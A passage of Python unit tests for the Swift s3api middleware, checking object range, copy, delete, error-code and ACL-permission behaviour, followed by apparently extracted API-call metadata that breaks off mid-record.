self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '1')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 3-3'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=1-'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '4')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 1-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
range_value = 'bytes=-3'
status, headers, body = self._test_object_HEAD_Range(range_value)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-length' in headers)
self.assertEqual(headers['content-length'], '3')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 2-4'))
self.assertTrue('x-amz-meta-test' in headers)
self.assertEqual('swift', headers['x-amz-meta-test'])
@s3acl
def test_object_GET_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'PreconditionFailed')
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
@s3acl
def test_object_GET(self):
self._test_object_GETorHEAD('GET')
@s3acl(s3acl_only=True)
def test_object_GET_with_s3acl_and_keystone(self):
# for passing keystone authentication root
fake_auth = self.swift._fake_auth_middleware
with patch.object(FakeSwift, '_fake_auth_middleware',
_wrap_fake_auth_middleware(fake_auth)):
self._test_object_GETorHEAD('GET')
_, _, headers = self.swift.calls_with_headers[-1]
self.assertNotIn('Authorization', headers)
_, _, headers = self.swift.calls_with_headers[0]
self.assertNotIn('Authorization', headers)
@s3acl
def test_object_GET_Range(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET'},
headers={'Authorization': 'AWS test:tester:hmac',
'Range': 'bytes=0-3',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '206')
self.assertTrue('content-range' in headers)
self.assertTrue(headers['content-range'].startswith('bytes 0-3'))
@s3acl
def test_object_GET_Range_error(self):
code = self._test_method_error('GET', '/bucket/object',
swob.HTTPRequestedRangeNotSatisfiable)
self.assertEqual(code, 'InvalidRange')
@s3acl
def test_object_GET_Response(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'GET',
'QUERY_STRING':
'response-content-type=%s&'
'response-content-language=%s&'
'response-expires=%s&'
'response-cache-control=%s&'
'response-content-disposition=%s&'
'response-content-encoding=%s&'
% ('text/plain', 'en',
'Fri, 01 Apr 2014 12:00:00 GMT',
'no-cache',
'attachment',
'gzip')},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '200')
self.assertTrue('content-type' in headers)
self.assertEqual(headers['content-type'], 'text/plain')
self.assertTrue('content-language' in headers)
self.assertEqual(headers['content-language'], 'en')
self.assertTrue('expires' in headers)
self.assertEqual(headers['expires'], 'Fri, 01 Apr 2014 12:00:00 GMT')
self.assertTrue('cache-control' in headers)
self.assertEqual(headers['cache-control'], 'no-cache')
self.assertTrue('content-disposition' in headers)
self.assertEqual(headers['content-disposition'],
'attachment')
self.assertTrue('content-encoding' in headers)
self.assertEqual(headers['content-encoding'], 'gzip')
@s3acl
def test_object_PUT_error(self):
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestEntityTooLarge)
self.assertEqual(code, 'EntityTooLarge')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPUnprocessableEntity)
self.assertEqual(code, 'BadDigest')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPLengthRequired)
self.assertEqual(code, 'MissingContentLength')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPPreconditionFailed)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': ''})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?foo=bar'})
self.assertEqual(code, 'InvalidArgument')
# adding other query paramerters will cause an error
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo&bar=baz'})
self.assertEqual(code, 'InvalidArgument')
# ...even versionId appears in the last
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?bar=baz&versionId=foo'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/bucket/src_obj?versionId=foo'})
self.assertEqual(code, 'NotImplemented')
code = self._test_method_error(
'PUT', '/bucket/object',
swob.HTTPCreated,
{'X-Amz-Copy-Source': '/src_bucket/src_object',
'X-Amz-Copy-Source-Range': 'bytes=0-0'})
self.assertEqual(code, 'InvalidArgument')
code = self._test_method_error('PUT', '/bucket/object',
swob.HTTPRequestTimeout)
self.assertEqual(code, 'RequestTimeout')
@s3acl
def test_object_PUT(self):
etag = self.response_headers['etag']
content_md5 = etag.decode('hex').encode('base64').strip()
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'x-amz-storage-class': 'STANDARD',
'Content-MD5': content_md5,
'Date': self.get_date_header()},
body=self.object_body)
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '200')
# Check that s3api returns an etag header.
self.assertEqual(headers['etag'], '"%s"' % etag)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that s3api converts a Content-MD5 header into an etag.
self.assertEqual(headers['etag'], etag)
def test_object_PUT_headers(self):
content_md5 = self.etag.decode('hex').encode('base64').strip()
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
swob.HTTPOk, {'last-modified': self.last_modified},
None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS test:tester:hmac',
'X-Amz-Storage-Class': 'STANDARD',
'X-Amz-Meta-Something': 'oh hai',
'X-Amz-Meta-Unreadable-Prefix': '\x04w',
'X-Amz-Meta-Unreadable-Suffix': 'h\x04',
'X-Amz-Meta-Lots-Of-Unprintable': 5 * '\x04',
'X-Amz-Copy-Source': '/some/source',
'Content-MD5': content_md5,
'Date': self.get_date_header()})
req.date = datetime.now()
req.content_type = 'text/plain'
status, headers, body = self.call_s3api(req)
# Check that s3api does not return an etag header,
# specified copy source.
self.assertTrue(headers.get('etag') is None)
# Check that s3api does not return custom metadata in response
self.assertTrue(headers.get('x-amz-meta-something') is None)
_, _, headers = self.swift.calls_with_headers[-1]
# Check that s3api converts a Content-MD5 header into an etag.
self.assertEqual(headers['ETag'], self.etag)
self.assertEqual(headers['X-Object-Meta-Something'], 'oh hai')
self.assertEqual(headers['X-Object-Meta-Unreadable-Prefix'],
'=?UTF-8?Q?=04w?=')
self.assertEqual(headers['X-Object-Meta-Unreadable-Suffix'],
'=?UTF-8?Q?h=04?=')
self.assertEqual(headers['X-Object-Meta-Lots-Of-Unprintable'],
'=?UTF-8?B?BAQEBAQ=?=')
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
def _test_object_PUT_copy(self, head_resp, put_header=None,
src_path='/some/source', timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/some/source',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy(src_path, put_header, timestamp)
def _test_object_PUT_copy_self(self, head_resp,
put_header=None, timestamp=None):
account = 'test:tester'
grants = [Grant(User(account), 'FULL_CONTROL')]
head_headers = \
encode_acl('object',
ACL(Owner(account, account), grants))
head_headers.update({'last-modified': self.last_modified})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
head_resp, head_headers, None)
put_header = put_header or {}
return self._call_object_copy('/bucket/object', put_header, timestamp)
def _call_object_copy(self, src_path, put_header, timestamp=None):
put_headers = {'Authorization': 'AWS test:tester:hmac',
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()}
put_headers.update(put_header)
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers=put_headers)
req.date = datetime.now()
req.content_type = 'text/plain'
timestamp = timestamp or time.time()
with patch('swift.common.middleware.s3api.utils.time.time',
return_value=timestamp):
return self.call_s3api(req)
@s3acl
def test_object_PUT_copy(self):
def do_test(src_path=None):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
status, headers, body = self._test_object_PUT_copy(
swob.HTTPOk, put_header={'Date': date_header},
timestamp=timestamp, src_path=src_path)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
self.assertTrue(headers.get('x-amz-meta-something') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/some/source')
self.assertEqual(headers['Content-Length'], '0')
do_test('/some/source')
do_test('/some/source?')
do_test('/some/source?versionId=null')
# Some clients (like Boto) don't include the leading slash;
# AWS seems to tolerate this so we should, too
do_test('some/source')
@s3acl
def test_object_PUT_copy_self(self):
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_copy(self):
header = {'x-amz-metadata-directive': 'COPY'}
status, headers, body = \
self._test_object_PUT_copy_self(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '400')
elem = fromstring(body, 'Error')
err_msg = ("This copy request is illegal because it is trying to copy "
"an object to itself without changing the object's "
"metadata, storage class, website redirect location or "
"encryption attributes.")
self.assertEqual(elem.find('Code').text, 'InvalidRequest')
self.assertEqual(elem.find('Message').text, err_msg)
@s3acl
def test_object_PUT_copy_self_metadata_replace(self):
date_header = self.get_date_header()
timestamp = mktime(date_header)
last_modified = S3Timestamp(timestamp).s3xmlformat
header = {'x-amz-metadata-directive': 'REPLACE',
'Date': date_header}
status, headers, body = self._test_object_PUT_copy_self(
swob.HTTPOk, header, timestamp=timestamp)
self.assertEqual(status.split()[0], '200')
self.assertEqual(headers['Content-Type'], 'application/xml')
self.assertTrue(headers.get('etag') is None)
elem = fromstring(body, 'CopyObjectResult')
self.assertEqual(elem.find('LastModified').text, last_modified)
self.assertEqual(elem.find('ETag').text, '"%s"' % self.etag)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertEqual(headers['X-Copy-From'], '/bucket/object')
self.assertEqual(headers['Content-Length'], '0')
@s3acl
def test_object_PUT_copy_headers_error(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-None-Match': etag}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = {'X-Amz-Copy-Source-If-Modified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPNotModified,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
header = \
{'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPPreconditionFailed,
header)
self.assertEqual(self._get_error_code(body), 'PreconditionFailed')
def test_object_PUT_copy_headers_with_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 11:00:00 GMT'
header = {'X-Amz-Copy-Source-If-Match': etag,
'X-Amz-Copy-Source-If-Modified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 3)
# After the check of the copy source in the case of s3acl is valid,
# s3api check the bucket write permissions of the destination.
_, _, headers = self.swift.calls_with_headers[-2]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-Match') is None)
self.assertTrue(headers.get('If-Modified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-Match'], etag)
self.assertEqual(headers['If-Modified-Since'], last_modified_since)
def test_object_PUT_copy_headers_with_not_match(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
self.assertEqual(len(self.swift.calls_with_headers), 2)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_headers_with_not_match_and_s3acl(self):
etag = '7dfa07a8e59ddbcd1dc84d4c4f82aea1'
last_modified_since = 'Fri, 01 Apr 2014 12:00:00 GMT'
header = {'X-Amz-Copy-Source-If-None-Match': etag,
'X-Amz-Copy-Source-If-Unmodified-Since': last_modified_since,
'Date': self.get_date_header()}
status, header, body = \
self._test_object_PUT_copy(swob.HTTPOk, header)
self.assertEqual(status.split()[0], '200')
# After the check of the copy source in the case of s3acl is valid,
# s3api check the bucket write permissions of the destination.
self.assertEqual(len(self.swift.calls_with_headers), 3)
_, _, headers = self.swift.calls_with_headers[-1]
self.assertTrue(headers.get('If-None-Match') is None)
self.assertTrue(headers.get('If-Unmodified-Since') is None)
_, _, headers = self.swift.calls_with_headers[0]
self.assertEqual(headers['If-None-Match'], etag)
self.assertEqual(headers['If-Unmodified-Since'], last_modified_since)
@s3acl
def test_object_POST_error(self):
code = self._test_method_error('POST', '/bucket/object', None)
self.assertEqual(code, 'NotImplemented')
@s3acl
def test_object_DELETE_error(self):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPUnauthorized)
self.assertEqual(code, 'SignatureDoesNotMatch')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPForbidden)
self.assertEqual(code, 'AccessDenied')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServerError)
self.assertEqual(code, 'InternalError')
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPServiceUnavailable)
self.assertEqual(code, 'InternalError')
with patch(
'swift.common.middleware.s3api.s3request.get_container_info',
return_value={'status': 204}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchKey')
with patch(
'swift.common.middleware.s3api.s3request.get_container_info',
return_value={'status': 404}):
code = self._test_method_error('DELETE', '/bucket/object',
swob.HTTPNotFound)
self.assertEqual(code, 'NoSuchBucket')
@s3acl
def test_object_DELETE_no_multipart(self):
self.s3api.conf.allow_multipart_uploads = False
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '204')
self.assertNotIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_object_DELETE_multipart(self):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '204')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
_, path = self.swift.calls[-1]
self.assertEqual(path.count('?'), 0)
@s3acl
def test_slo_object_DELETE(self):
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPOk,
{'x-static-large-object': 'True'},
None)
self.swift.register('DELETE', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, {}, '<SLO delete results>')
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header(),
'Content-Type': 'foo/bar'})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '204')
self.assertEqual(body, '')
self.assertIn(('HEAD', '/v1/AUTH_test/bucket/object'),
self.swift.calls)
self.assertIn(('DELETE', '/v1/AUTH_test/bucket/object'
'?multipart-manifest=delete'),
self.swift.calls)
_, path, headers = self.swift.calls_with_headers[-1]
path, query_string = path.split('?', 1)
query = {}
for q in query_string.split('&'):
key, arg = q.split('=')
query[key] = arg
self.assertEqual(query['multipart-manifest'], 'delete')
self.assertNotIn('Content-Type', headers)
def _test_object_for_s3acl(self, method, account):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS %s:hmac' % account,
'Date': self.get_date_header()})
return self.call_s3api(req)
def _test_set_container_permission(self, account, permission):
grants = [Grant(User(account), permission)]
headers = \
encode_acl('container',
ACL(Owner('test:tester', 'test:tester'), grants))
self.swift.register('HEAD', '/v1/AUTH_test/bucket',
swob.HTTPNoContent, headers, None)
@s3acl(s3acl_only=True)
def test_object_GET_without_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_GET_with_read_permission(self):
status, headers, body = self._test_object_for_s3acl('GET',
'test:read')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_GET_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_for_s3acl('GET', 'test:full_control')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_without_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:other')
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_PUT_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('PUT',
'test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = \
self._test_object_for_s3acl('PUT', account)
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_DELETE_without_permission(self):
account = 'test:other'
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(self._get_error_code(body), 'AccessDenied')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_owner_permission(self):
status, headers, body = self._test_object_for_s3acl('DELETE',
'test:tester')
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_write_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'WRITE')
status, headers, body = self._test_object_for_s3acl('DELETE',
account)
self.assertEqual(status.split()[0], '204')
@s3acl(s3acl_only=True)
def test_object_DELETE_with_fullcontrol_permission(self):
account = 'test:other'
self._test_set_container_permission(account, 'FULL_CONTROL')
status, headers, body = self._test_object_for_s3acl('DELETE', account)
self.assertEqual(status.split()[0], '204')
def _test_object_copy_for_s3acl(self, account, src_permission=None,
src_path='/src_bucket/src_obj'):
owner = 'test:tester'
grants = [Grant(User(account), src_permission)] \
if src_permission else [Grant(User(owner), 'FULL_CONTROL')]
src_o_headers = \
encode_acl('object', ACL(Owner(owner, owner), grants))
src_o_headers.update({'last-modified': self.last_modified})
self.swift.register(
'HEAD', join('/v1/AUTH_test', src_path.lstrip('/')),
swob.HTTPOk, src_o_headers, None)
req = Request.blank(
'/bucket/object',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Authorization': 'AWS %s:hmac' % account,
'X-Amz-Copy-Source': src_path,
'Date': self.get_date_header()})
return self.call_s3api(req)
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_owner_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:tester')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_fullcontrol_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:full_control',
'FULL_CONTROL')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_with_grantee_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write', 'READ')
self.assertEqual(status.split()[0], '200')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_src_obj_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:write')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_without_dst_container_permission(self):
status, headers, body = \
self._test_object_copy_for_s3acl('test:other', 'READ')
self.assertEqual(status.split()[0], '403')
@s3acl(s3acl_only=True)
def test_object_PUT_copy_empty_src_path(self):
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self._test_object_copy_for_s3acl(
'test:write', 'READ', src_path='')
self.assertEqual(status.split()[0], '400')
class TestS3ApiObjNonUTC(TestS3ApiObj):
def setUp(self):
self.orig_tz = os.environ.get('TZ', '')
os.environ['TZ'] = 'EST+05EDT,M4.1.0,M10.5.0'
time.tzset()
super(TestS3ApiObjNonUTC, self).setUp()
def tearDown(self):
super(TestS3ApiObjNonUTC, self).tearDown()
os.environ['TZ'] = self.orig_tz
time.tzset()
if __name__ == '__main__':
unittest.main()
| [
"swift.common.middleware.s3api.subresource.User",
"mock.patch",
"hashlib.md5",
"swift.common.middleware.s3api.etree.fromstring",
"time.tzset",
"os.environ.get",
"datetime.datetime.now",
"swift.common.swob.Request.blank",
"swift.common.middleware.s3api.subresource.Owner",
"swift.common.middleware.s3api.utils.S3Timestamp",
"time.time",
"unittest.main",
"swift.common.middleware.s3api.utils.mktime",
"test.unit.common.middleware.s3api.test_s3_acl.s3acl"
]
| [((13899, 13921), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (13904, 13921), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((32337, 32359), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (32342, 32359), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((34580, 34602), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (34585, 34602), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((41001, 41023), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41006, 41023), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((41290, 41312), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41295, 41312), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((41562, 41584), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41567, 41584), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((41803, 41825), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (41808, 41825), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42092, 42114), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (42097, 42114), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42367, 42389), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (42372, 42389), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42669, 42691), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (42674, 42691), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((42998, 43020), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43003, 43020), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((43319, 43341), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43324, 43341), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((43600, 43622), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43605, 43622), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((43968, 43990), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (43973, 43990), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45205, 45227), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (45210, 45227), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45437, 45459), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': 